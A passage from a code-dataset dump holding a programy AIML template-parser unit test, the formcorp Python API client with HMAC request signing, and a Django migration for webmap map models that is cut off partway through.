f0a7eb33be2ec8de630644a6393296ddd2576eee
[ "MIT" ]
null
null
null
import unittest import xml.etree.ElementTree as ET from programy.bot import Bot from programy.brain import Brain from programy.config import ClientConfiguration, BrainConfiguration from programy.dialog import Question, Sentence from programy.parser.template.graph import TemplateGraph from programy.parser.template.nodes import * class TemplateGraphBasicTests(unittest.TestCase): def setUp(self): self.parser = TemplateGraph() self.assertIsNotNone(self.parser) self.test_brain = None self.test_sentence = Sentence("test sentence") self.test_sentence._stars = ['one', 'two', 'three', 'four', 'five', 'six'] self.test_sentence._thatstars = ["*"] self.test_sentence._topicstars = ["*"] test_config = ClientConfiguration() self.test_bot = Bot(Brain(BrainConfiguration()), config=test_config.bot_configuration) self.test_clientid = "testid" conversation = self.test_bot.get_conversation(self.test_clientid) question = Question.create_from_sentence(self.test_sentence) conversation._questions.append(question) def test_template_no_content(self): template = ET.fromstring(""" <template> </template> """) with self.assertRaises(ParserException): ast = self.parser.parse_template_expression(template) def test_base_template(self): template = ET.fromstring(""" <template>HELLO WORLD</template> """) ast = self.parser.parse_template_expression(template) self.assertIsNotNone(ast) self.assertEqual(2, len(ast.children)) self.assertIsInstance(ast.children[0], TemplateWordNode) self.assertIsInstance(ast.children[1], TemplateWordNode) if __name__ == '__main__': unittest.main()
32.527273
94
0.704304
import unittest import xml.etree.ElementTree as ET from programy.bot import Bot from programy.brain import Brain from programy.config import ClientConfiguration, BrainConfiguration from programy.dialog import Question, Sentence from programy.parser.template.graph import TemplateGraph from programy.parser.template.nodes import * class TemplateGraphBasicTests(unittest.TestCase): def setUp(self): self.parser = TemplateGraph() self.assertIsNotNone(self.parser) self.test_brain = None self.test_sentence = Sentence("test sentence") self.test_sentence._stars = ['one', 'two', 'three', 'four', 'five', 'six'] self.test_sentence._thatstars = ["*"] self.test_sentence._topicstars = ["*"] test_config = ClientConfiguration() self.test_bot = Bot(Brain(BrainConfiguration()), config=test_config.bot_configuration) self.test_clientid = "testid" conversation = self.test_bot.get_conversation(self.test_clientid) question = Question.create_from_sentence(self.test_sentence) conversation._questions.append(question) def test_template_no_content(self): template = ET.fromstring(""" <template> </template> """) with self.assertRaises(ParserException): ast = self.parser.parse_template_expression(template) def test_base_template(self): template = ET.fromstring(""" <template>HELLO WORLD</template> """) ast = self.parser.parse_template_expression(template) self.assertIsNotNone(ast) self.assertEqual(2, len(ast.children)) self.assertIsInstance(ast.children[0], TemplateWordNode) self.assertIsInstance(ast.children[1], TemplateWordNode) if __name__ == '__main__': unittest.main()
true
true
f728d2dec5e64da29b8b087fc4f90f8e4c08de12
5,641
py
Python
formcorp/api.py
formcorp/python-formcorp
ed8d3767c260d45d084a7df8c25e485bb62752dc
[ "Apache-2.0" ]
null
null
null
formcorp/api.py
formcorp/python-formcorp
ed8d3767c260d45d084a7df8c25e485bb62752dc
[ "Apache-2.0" ]
null
null
null
formcorp/api.py
formcorp/python-formcorp
ed8d3767c260d45d084a7df8c25e485bb62752dc
[ "Apache-2.0" ]
null
null
null
from collections import OrderedDict import hashlib import base64 import hmac import httplib import json import random import string import time import urllib """ API configuration. """ API_HOSTNAME = 'api.formcorp.com.au' # Module constants _constants = { 'SIGNATURE_ENCODING': "utf-8", 'REQUEST_TYPE_POST': 'POST', 'REQUEST_TYPE_GET': 'GET', 'REQUEST_TYPE_PUT': 'PUT', 'HEADER_PARAM_AUTHORIZATION': 'Authorization', 'HEADER_PARAM_SIGNATURE': 'Signature', 'HEADER_PARAM_ACCEPT': 'Accept', 'HEADER_PARAM_BEARER': 'Bearer {0}', 'HEADER_APPLICATION_JSON': 'application/json', 'HEADER_PARAM_CONTENT_TYPE': 'Content-type', 'HEADER_URL_FORM_ENCODED_TYPE': 'application/x-www-form-urlencoded' } # Configuration client can alter _config = dict(private_key=None, public_key=None, form_id=None, use_ssl=True) def init(private_key, public_key): """ Initialise the module. :type private_key: basestring :type public_key: basestring """ assert isinstance(private_key, basestring) assert isinstance(public_key, basestring) _config['private_key'] = private_key _config['public_key'] = public_key def use_ssl(ssl=True): """ Whether to use SSL when communicating with the remote API :type ssl: boolean """ _config['use_ssl'] = ssl def set_form_id(form_id): """ Set the form id :type form_id: int """ assert isinstance(form_id, int) _config['form_id'] = form_id def call(uri, request_method=None, data=None, headers=None): """ Shoot off a call to the remote API. :param uri: :param request_method: :param data: :param headers: :return: """ # Set default values if request_method is None: request_method = _constants['REQUEST_TYPE_POST'] if data is None: data = {} if headers is None: headers = {} # Check to make sure first character is a forward slash if uri[0:1] != '/': uri = '/' + uri # Set base headers headers[_constants['HEADER_PARAM_AUTHORIZATION']] = _constants['HEADER_PARAM_BEARER'].format(_config['public_key']) headers[_constants['HEADER_PARAM_SIGNATURE']] = _generate_signature(request_method, uri, data) headers[_constants['HEADER_PARAM_ACCEPT']] = _constants['HEADER_APPLICATION_JSON'] # Initialise the connection if _config['use_ssl']: connection = httplib.HTTPSConnection(API_HOSTNAME) else: connection = httplib.HTTPConnection(API_HOSTNAME) if request_method.upper() == _constants['REQUEST_TYPE_POST']: # Send a POST request headers[_constants['HEADER_PARAM_CONTENT_TYPE']] = _constants['HEADER_URL_FORM_ENCODED_TYPE'] connection.request(_constants['REQUEST_TYPE_POST'], uri, urllib.urlencode(data), headers) elif request_method.upper() == _constants['REQUEST_TYPE_GET']: # Send a GET request connection.request(_constants['REQUEST_TYPE_GET'], uri, headers) # Retrieve the results of the request result = connection.getresponse() # Ensure a valid response was received from the server if result.status != 200: raise Exception("Unable to connect to remote API") # Attempt to decode json result res = result.read() try: data = json.loads(res) except ValueError: raise Exception("Unable to decode server result") return data def get_token(): """ Retrieve a token from the server. :return: string """ if not _initialised(): return False post_data = { 'timestamp': int(time.time()), 'nonce': _generate_nonce() } result = call('v1/auth/token', 'POST', post_data) # Attempt to return the result from the server try: return result['token'] except KeyError: return False def _initialised(): """ Checks to see if the API has been properly initialised :return: boolean """ try: assert isinstance(_config['private_key'], basestring) assert isinstance(_config['public_key'], basestring) assert isinstance(_config['form_id'], int) return True except AssertionError: return False def _generate_nonce(length=40): """ Generates a random nonce string :type length: int """ return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length)) def _api_url(): """ Generates a signature to use to uniquely identify the request :return: string """ url = "http" if _config["use_ssl"]: url += "s" url += '://{0}'.format(API_HOSTNAME) def _generate_signature(request_method, uri, data=None): """ Generate a signature to send with the request. :param request_method: string :param uri: string :param data: dict :return: string """ if data is None: data = {} # Typecast each dictionary object to string if len(data) > 0: for attr, value in data.iteritems(): data[attr] = str(value) # Create an ordered dict (python sorts by key hashes, need to sort in order elements were added) obj = OrderedDict() obj['method'] = request_method.upper() obj['uri'] = uri obj['data'] = data plaintext = json.dumps(obj) plaintext = plaintext.replace('": "', '":"').replace('": {', '":{').replace('": [', '":[').replace('/', '\/').replace('", "', '","') # Encode the string encoded = unicode(plaintext, _constants['SIGNATURE_ENCODING']) hash = base64.b64encode(hmac.new(_config['private_key'], encoded, hashlib.sha1).hexdigest()) return hash
26.608491
136
0.655735
from collections import OrderedDict import hashlib import base64 import hmac import httplib import json import random import string import time import urllib API_HOSTNAME = 'api.formcorp.com.au' _constants = { 'SIGNATURE_ENCODING': "utf-8", 'REQUEST_TYPE_POST': 'POST', 'REQUEST_TYPE_GET': 'GET', 'REQUEST_TYPE_PUT': 'PUT', 'HEADER_PARAM_AUTHORIZATION': 'Authorization', 'HEADER_PARAM_SIGNATURE': 'Signature', 'HEADER_PARAM_ACCEPT': 'Accept', 'HEADER_PARAM_BEARER': 'Bearer {0}', 'HEADER_APPLICATION_JSON': 'application/json', 'HEADER_PARAM_CONTENT_TYPE': 'Content-type', 'HEADER_URL_FORM_ENCODED_TYPE': 'application/x-www-form-urlencoded' } _config = dict(private_key=None, public_key=None, form_id=None, use_ssl=True) def init(private_key, public_key): assert isinstance(private_key, basestring) assert isinstance(public_key, basestring) _config['private_key'] = private_key _config['public_key'] = public_key def use_ssl(ssl=True): _config['use_ssl'] = ssl def set_form_id(form_id): assert isinstance(form_id, int) _config['form_id'] = form_id def call(uri, request_method=None, data=None, headers=None): if request_method is None: request_method = _constants['REQUEST_TYPE_POST'] if data is None: data = {} if headers is None: headers = {} if uri[0:1] != '/': uri = '/' + uri headers[_constants['HEADER_PARAM_AUTHORIZATION']] = _constants['HEADER_PARAM_BEARER'].format(_config['public_key']) headers[_constants['HEADER_PARAM_SIGNATURE']] = _generate_signature(request_method, uri, data) headers[_constants['HEADER_PARAM_ACCEPT']] = _constants['HEADER_APPLICATION_JSON'] if _config['use_ssl']: connection = httplib.HTTPSConnection(API_HOSTNAME) else: connection = httplib.HTTPConnection(API_HOSTNAME) if request_method.upper() == _constants['REQUEST_TYPE_POST']: headers[_constants['HEADER_PARAM_CONTENT_TYPE']] = _constants['HEADER_URL_FORM_ENCODED_TYPE'] connection.request(_constants['REQUEST_TYPE_POST'], uri, urllib.urlencode(data), headers) elif request_method.upper() == _constants['REQUEST_TYPE_GET']: connection.request(_constants['REQUEST_TYPE_GET'], uri, headers) result = connection.getresponse() if result.status != 200: raise Exception("Unable to connect to remote API") res = result.read() try: data = json.loads(res) except ValueError: raise Exception("Unable to decode server result") return data def get_token(): if not _initialised(): return False post_data = { 'timestamp': int(time.time()), 'nonce': _generate_nonce() } result = call('v1/auth/token', 'POST', post_data) try: return result['token'] except KeyError: return False def _initialised(): try: assert isinstance(_config['private_key'], basestring) assert isinstance(_config['public_key'], basestring) assert isinstance(_config['form_id'], int) return True except AssertionError: return False def _generate_nonce(length=40): return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length)) def _api_url(): url = "http" if _config["use_ssl"]: url += "s" url += '://{0}'.format(API_HOSTNAME) def _generate_signature(request_method, uri, data=None): if data is None: data = {} if len(data) > 0: for attr, value in data.iteritems(): data[attr] = str(value) obj = OrderedDict() obj['method'] = request_method.upper() obj['uri'] = uri obj['data'] = data plaintext = json.dumps(obj) plaintext = plaintext.replace('": "', '":"').replace('": {', '":{').replace('": [', '":[').replace('/', '\/').replace('", "', '","') encoded = unicode(plaintext, _constants['SIGNATURE_ENCODING']) hash = base64.b64encode(hmac.new(_config['private_key'], encoded, hashlib.sha1).hexdigest()) return hash
true
true
f728d3c7782a5500e0e5be7cb059e077cdfa6300
16,000
py
Python
webmap/migrations/0001_initial.py
tmszi/django-webmap-corpus
9c6046dd1d2750fa140cb817504bf9603b16e7fa
[ "MIT" ]
3
2015-11-05T01:29:32.000Z
2018-03-26T10:48:15.000Z
webmap/migrations/0001_initial.py
tmszi/django-webmap-corpus
9c6046dd1d2750fa140cb817504bf9603b16e7fa
[ "MIT" ]
1
2017-02-11T12:22:31.000Z
2017-02-12T21:34:47.000Z
webmap/migrations/0001_initial.py
tmszi/django-webmap-corpus
9c6046dd1d2750fa140cb817504bf9603b16e7fa
[ "MIT" ]
3
2017-02-11T12:08:45.000Z
2021-02-23T11:37:00.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import colorful.fields import django.contrib.gis.db.models.fields from django.conf import settings import webmap.utils class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Layer', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(default='', help_text='Name of the layer', max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, verbose_name='name in URL')), ('desc', models.TextField(help_text='Layer description.', null=True, verbose_name='description', blank=True)), ('order', models.IntegerField(default=0, verbose_name='order')), ('remark', models.TextField(help_text='Internal information about layer.', null=True, verbose_name='internal remark', blank=True)), ('enabled', models.BooleanField(default=True, help_text='True = the layer is enabled on map load', verbose_name='Enabled by defalut')), ], options={ 'ordering': ['order'], 'verbose_name': 'layer', 'verbose_name_plural': 'layers', }, bases=(models.Model,), ), migrations.CreateModel( name='BaseLayer', fields=[ ('layer_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='webmap.Layer', on_delete=models.CASCADE)), ('url', models.URLField(help_text='Base layer tiles url. e.g. ', null=True, verbose_name='URL', blank=True)), ], options={ 'verbose_name': 'base layer', 'verbose_name_plural': 'base layers', }, bases=('webmap.layer',), ), migrations.CreateModel( name='Legend', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(unique=True, max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, verbose_name='name in URL')), ('desc', models.TextField(null=True, verbose_name='description', blank=True)), ('image', models.ImageField(upload_to='ikony', storage=webmap.utils.SlugifyFileSystemStorage(), verbose_name='image')), ], options={ 'verbose_name': 'legend item', 'verbose_name_plural': 'legend items', }, bases=(models.Model,), ), migrations.CreateModel( name='License', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='License name', max_length=255, verbose_name='name')), ('desc', models.TextField(help_text='License description.', null=True, verbose_name='description', blank=True)), ], options={ 'verbose_name': 'license', 'verbose_name_plural': 'licenses', }, bases=(models.Model,), ), migrations.CreateModel( name='Marker', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Name of the marker.', unique=True, max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, null=True, verbose_name='name in URL')), ('desc', models.TextField(help_text='Detailed marker descrption.', null=True, verbose_name='description', blank=True)), ('remark', models.TextField(help_text='Internal information about layer.', null=True, verbose_name='internal remark', blank=True)), ('default_icon', models.ImageField(storage=webmap.utils.SlugifyFileSystemStorage(), upload_to='icons', null=True, verbose_name='default icon', blank=True)), ('menu_icon', models.ImageField(storage=webmap.utils.SlugifyFileSystemStorage(), upload_to='icons/marker/menu', null=True, verbose_name='menu icon', blank=True)), ('minzoom', models.PositiveIntegerField(default=1, help_text='Minimal zoom in which the POIs of this marker will be shown on the map.', verbose_name='Minimal zoom')), ('maxzoom', models.PositiveIntegerField(default=10, help_text='Maximal zoom in which the POIs of this marker will be shown on the map.', verbose_name='Maximal zoom')), ('line_width', models.FloatField(default=2, verbose_name='line width')), ('line_color', colorful.fields.RGBColorField(default='#ffc90e', verbose_name='line color')), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')), ('last_modification', models.DateTimeField(auto_now=True, verbose_name='last modification at')), ], options={ 'ordering': ['-layer__order', 'name'], 'verbose_name': 'marker', 'verbose_name_plural': 'markers', 'permissions': [('can_only_view', 'Can only view')], }, bases=(models.Model,), ), migrations.CreateModel( name='OverlayLayer', fields=[ ('layer_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='webmap.Layer', on_delete=models.CASCADE)), ], options={ 'verbose_name': 'overlay layer', 'verbose_name_plural': 'overlay layers', }, bases=('webmap.layer',), ), migrations.CreateModel( name='Photo', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Photo name', max_length=255, verbose_name='name', blank=True)), ('desc', models.TextField(help_text='Photo description.', null=True, verbose_name='description', blank=True)), ('order', models.IntegerField(default=0, verbose_name='order')), ('photographer', models.CharField(help_text='Full name of the author of the photography', max_length=255, verbose_name='Photography author', blank=True)), ('photo', models.ImageField(help_text='Upload photo in full resolution.', upload_to='photo', storage=webmap.utils.SlugifyFileSystemStorage(), verbose_name='photo')), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at', null=True)), ('last_modification', models.DateTimeField(auto_now=True, verbose_name='last modification at', null=True)), ('author', models.ForeignKey(related_name='photo_create', verbose_name='author', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)), ('license', models.ForeignKey(verbose_name='license', to='webmap.License', on_delete=models.CASCADE)), ], options={ 'ordering': ['order'], 'verbose_name': 'photo', 'verbose_name_plural': 'photographies', 'permissions': [('can_view_photo_list', 'Can view photo list')], }, bases=(models.Model,), ), migrations.CreateModel( name='Poi', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Exact place name', max_length=255, verbose_name='name')), ('importance', models.SmallIntegerField(default=0, help_text='Minimal zoom modificator (use 20+ to show always).<br/>', verbose_name='importance')), ('geom', django.contrib.gis.db.models.fields.GeometryField(help_text='Add point: Select pencil with plus sign icon and place your point to the map.<br/>\n Add line: Select line icon and by clicking to map draw the line. Finish drawing with double click.<br/>\n Add area: Select area icon and by clicking to mapy draw the area. Finish drawing with double click.<br/>\n Object edition: Select the first icon and then select object in map. Draw points in map to move them, use points in the middle of sections to add new edges.', srid=4326, verbose_name='place geometry')), ('desc', models.TextField(help_text='Text that will be shown after selecting POI.', null=True, verbose_name='description', blank=True)), ('desc_extra', models.TextField(help_text='Text that extends the description.', null=True, verbose_name='detailed description', blank=True)), ('url', models.URLField(help_text='Link to the web page of the place.', null=True, verbose_name='URL', blank=True)), ('address', models.CharField(help_text='Poi address (street, house number)', max_length=255, null=True, verbose_name='adress', blank=True)), ('remark', models.TextField(help_text='Internal information about POI.', null=True, verbose_name='Internal remark', blank=True)), ('properties_cache', models.CharField(max_length=255, null=True, blank=True)), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')), ('last_modification', models.DateTimeField(auto_now=True, verbose_name='last modification at')), ('author', models.ForeignKey(related_name='poi_create', verbose_name='author', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)), ('marker', models.ForeignKey(related_name='pois', verbose_name='marker', to='webmap.Marker', help_text='Select icon, that will be shown in map', on_delete=models.CASCADE)), ], options={ 'verbose_name': 'place', 'verbose_name_plural': 'places', 'permissions': [('can_only_own_data_only', 'Can only edit his own data'), ('can_edit_advanced_fields', 'Can edit importance status')], }, bases=(models.Model,), ), migrations.CreateModel( name='Property', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Status name', max_length=255, verbose_name='name')), ('as_filter', models.BooleanField(default=False, help_text='Show as a filter in right map menu?', verbose_name='as filter?')), ('order', models.IntegerField(default=0, verbose_name='order')), ('slug', models.SlugField(unique=True, verbose_name='Name in URL')), ('desc', models.TextField(help_text='Property description.', null=True, verbose_name='description', blank=True)), ('remark', models.TextField(help_text='Internal information about the property.', null=True, verbose_name='Internal remark', blank=True)), ('default_icon', models.ImageField(storage=webmap.utils.SlugifyFileSystemStorage(), upload_to='icons', null=True, verbose_name='default icon', blank=True)), ], options={ 'ordering': ['order'], 'verbose_name': 'property', 'verbose_name_plural': 'properties', }, bases=(models.Model,), ), migrations.CreateModel( name='Sector', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, verbose_name='name in URL')), ('geom', django.contrib.gis.db.models.fields.PolygonField(help_text='Sector area', srid=4326, verbose_name='area')), ], options={ 'verbose_name': 'sector', 'verbose_name_plural': 'sectors', }, bases=(models.Model,), ), migrations.CreateModel( name='Status', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Status name', unique=True, max_length=255, verbose_name='name')), ('desc', models.TextField(help_text='Status description.', null=True, verbose_name='description', blank=True)), ('show', models.BooleanField(default=False, help_text='Show to map user', verbose_name='show')), ('show_to_mapper', models.BooleanField(default=False, help_text='Show to mapper', verbose_name='show to mapper')), ], options={ 'verbose_name': 'status', 'verbose_name_plural': 'statuses', }, bases=(models.Model,), ), migrations.AddField( model_name='property', name='status', field=models.ForeignKey(verbose_name='status', to='webmap.Status', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='poi', name='properties', field=models.ManyToManyField(help_text='POI properties', to='webmap.Property', null=True, verbose_name='properties', blank=True), preserve_default=True, ), migrations.AddField( model_name='poi', name='status', field=models.ForeignKey(default=0, verbose_name='status', to='webmap.Status', help_text='POI status, determinse if it will be shown in map', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='poi', name='updated_by', field=models.ForeignKey(related_name='poi_update', verbose_name='last updated by', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='photo', name='poi', field=models.ForeignKey(related_name='photos', verbose_name='poi', to='webmap.Poi', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='photo', name='updated_by', field=models.ForeignKey(related_name='photo_update', verbose_name='last updated by', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='marker', name='layer', field=models.ForeignKey(verbose_name='layer', to='webmap.Layer', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='marker', name='status', field=models.ForeignKey(verbose_name='status', to='webmap.Status', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='layer', name='status', field=models.ForeignKey(verbose_name='status', to='webmap.Status', on_delete=models.CASCADE), preserve_default=True, ), ]
61.068702
619
0.605375
from __future__ import unicode_literals from django.db import models, migrations import colorful.fields import django.contrib.gis.db.models.fields from django.conf import settings import webmap.utils class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Layer', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(default='', help_text='Name of the layer', max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, verbose_name='name in URL')), ('desc', models.TextField(help_text='Layer description.', null=True, verbose_name='description', blank=True)), ('order', models.IntegerField(default=0, verbose_name='order')), ('remark', models.TextField(help_text='Internal information about layer.', null=True, verbose_name='internal remark', blank=True)), ('enabled', models.BooleanField(default=True, help_text='True = the layer is enabled on map load', verbose_name='Enabled by defalut')), ], options={ 'ordering': ['order'], 'verbose_name': 'layer', 'verbose_name_plural': 'layers', }, bases=(models.Model,), ), migrations.CreateModel( name='BaseLayer', fields=[ ('layer_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='webmap.Layer', on_delete=models.CASCADE)), ('url', models.URLField(help_text='Base layer tiles url. e.g. ', null=True, verbose_name='URL', blank=True)), ], options={ 'verbose_name': 'base layer', 'verbose_name_plural': 'base layers', }, bases=('webmap.layer',), ), migrations.CreateModel( name='Legend', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(unique=True, max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, verbose_name='name in URL')), ('desc', models.TextField(null=True, verbose_name='description', blank=True)), ('image', models.ImageField(upload_to='ikony', storage=webmap.utils.SlugifyFileSystemStorage(), verbose_name='image')), ], options={ 'verbose_name': 'legend item', 'verbose_name_plural': 'legend items', }, bases=(models.Model,), ), migrations.CreateModel( name='License', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='License name', max_length=255, verbose_name='name')), ('desc', models.TextField(help_text='License description.', null=True, verbose_name='description', blank=True)), ], options={ 'verbose_name': 'license', 'verbose_name_plural': 'licenses', }, bases=(models.Model,), ), migrations.CreateModel( name='Marker', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Name of the marker.', unique=True, max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, null=True, verbose_name='name in URL')), ('desc', models.TextField(help_text='Detailed marker descrption.', null=True, verbose_name='description', blank=True)), ('remark', models.TextField(help_text='Internal information about layer.', null=True, verbose_name='internal remark', blank=True)), ('default_icon', models.ImageField(storage=webmap.utils.SlugifyFileSystemStorage(), upload_to='icons', null=True, verbose_name='default icon', blank=True)), ('menu_icon', models.ImageField(storage=webmap.utils.SlugifyFileSystemStorage(), upload_to='icons/marker/menu', null=True, verbose_name='menu icon', blank=True)), ('minzoom', models.PositiveIntegerField(default=1, help_text='Minimal zoom in which the POIs of this marker will be shown on the map.', verbose_name='Minimal zoom')), ('maxzoom', models.PositiveIntegerField(default=10, help_text='Maximal zoom in which the POIs of this marker will be shown on the map.', verbose_name='Maximal zoom')), ('line_width', models.FloatField(default=2, verbose_name='line width')), ('line_color', colorful.fields.RGBColorField(default='#ffc90e', verbose_name='line color')), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')), ('last_modification', models.DateTimeField(auto_now=True, verbose_name='last modification at')), ], options={ 'ordering': ['-layer__order', 'name'], 'verbose_name': 'marker', 'verbose_name_plural': 'markers', 'permissions': [('can_only_view', 'Can only view')], }, bases=(models.Model,), ), migrations.CreateModel( name='OverlayLayer', fields=[ ('layer_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='webmap.Layer', on_delete=models.CASCADE)), ], options={ 'verbose_name': 'overlay layer', 'verbose_name_plural': 'overlay layers', }, bases=('webmap.layer',), ), migrations.CreateModel( name='Photo', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Photo name', max_length=255, verbose_name='name', blank=True)), ('desc', models.TextField(help_text='Photo description.', null=True, verbose_name='description', blank=True)), ('order', models.IntegerField(default=0, verbose_name='order')), ('photographer', models.CharField(help_text='Full name of the author of the photography', max_length=255, verbose_name='Photography author', blank=True)), ('photo', models.ImageField(help_text='Upload photo in full resolution.', upload_to='photo', storage=webmap.utils.SlugifyFileSystemStorage(), verbose_name='photo')), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at', null=True)), ('last_modification', models.DateTimeField(auto_now=True, verbose_name='last modification at', null=True)), ('author', models.ForeignKey(related_name='photo_create', verbose_name='author', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)), ('license', models.ForeignKey(verbose_name='license', to='webmap.License', on_delete=models.CASCADE)), ], options={ 'ordering': ['order'], 'verbose_name': 'photo', 'verbose_name_plural': 'photographies', 'permissions': [('can_view_photo_list', 'Can view photo list')], }, bases=(models.Model,), ), migrations.CreateModel( name='Poi', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Exact place name', max_length=255, verbose_name='name')), ('importance', models.SmallIntegerField(default=0, help_text='Minimal zoom modificator (use 20+ to show always).<br/>', verbose_name='importance')), ('geom', django.contrib.gis.db.models.fields.GeometryField(help_text='Add point: Select pencil with plus sign icon and place your point to the map.<br/>\n Add line: Select line icon and by clicking to map draw the line. Finish drawing with double click.<br/>\n Add area: Select area icon and by clicking to mapy draw the area. Finish drawing with double click.<br/>\n Object edition: Select the first icon and then select object in map. Draw points in map to move them, use points in the middle of sections to add new edges.', srid=4326, verbose_name='place geometry')), ('desc', models.TextField(help_text='Text that will be shown after selecting POI.', null=True, verbose_name='description', blank=True)), ('desc_extra', models.TextField(help_text='Text that extends the description.', null=True, verbose_name='detailed description', blank=True)), ('url', models.URLField(help_text='Link to the web page of the place.', null=True, verbose_name='URL', blank=True)), ('address', models.CharField(help_text='Poi address (street, house number)', max_length=255, null=True, verbose_name='adress', blank=True)), ('remark', models.TextField(help_text='Internal information about POI.', null=True, verbose_name='Internal remark', blank=True)), ('properties_cache', models.CharField(max_length=255, null=True, blank=True)), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')), ('last_modification', models.DateTimeField(auto_now=True, verbose_name='last modification at')), ('author', models.ForeignKey(related_name='poi_create', verbose_name='author', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)), ('marker', models.ForeignKey(related_name='pois', verbose_name='marker', to='webmap.Marker', help_text='Select icon, that will be shown in map', on_delete=models.CASCADE)), ], options={ 'verbose_name': 'place', 'verbose_name_plural': 'places', 'permissions': [('can_only_own_data_only', 'Can only edit his own data'), ('can_edit_advanced_fields', 'Can edit importance status')], }, bases=(models.Model,), ), migrations.CreateModel( name='Property', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Status name', max_length=255, verbose_name='name')), ('as_filter', models.BooleanField(default=False, help_text='Show as a filter in right map menu?', verbose_name='as filter?')), ('order', models.IntegerField(default=0, verbose_name='order')), ('slug', models.SlugField(unique=True, verbose_name='Name in URL')), ('desc', models.TextField(help_text='Property description.', null=True, verbose_name='description', blank=True)), ('remark', models.TextField(help_text='Internal information about the property.', null=True, verbose_name='Internal remark', blank=True)), ('default_icon', models.ImageField(storage=webmap.utils.SlugifyFileSystemStorage(), upload_to='icons', null=True, verbose_name='default icon', blank=True)), ], options={ 'ordering': ['order'], 'verbose_name': 'property', 'verbose_name_plural': 'properties', }, bases=(models.Model,), ), migrations.CreateModel( name='Sector', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(max_length=255, verbose_name='name')), ('slug', models.SlugField(unique=True, verbose_name='name in URL')), ('geom', django.contrib.gis.db.models.fields.PolygonField(help_text='Sector area', srid=4326, verbose_name='area')), ], options={ 'verbose_name': 'sector', 'verbose_name_plural': 'sectors', }, bases=(models.Model,), ), migrations.CreateModel( name='Status', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(help_text='Status name', unique=True, max_length=255, verbose_name='name')), ('desc', models.TextField(help_text='Status description.', null=True, verbose_name='description', blank=True)), ('show', models.BooleanField(default=False, help_text='Show to map user', verbose_name='show')), ('show_to_mapper', models.BooleanField(default=False, help_text='Show to mapper', verbose_name='show to mapper')), ], options={ 'verbose_name': 'status', 'verbose_name_plural': 'statuses', }, bases=(models.Model,), ), migrations.AddField( model_name='property', name='status', field=models.ForeignKey(verbose_name='status', 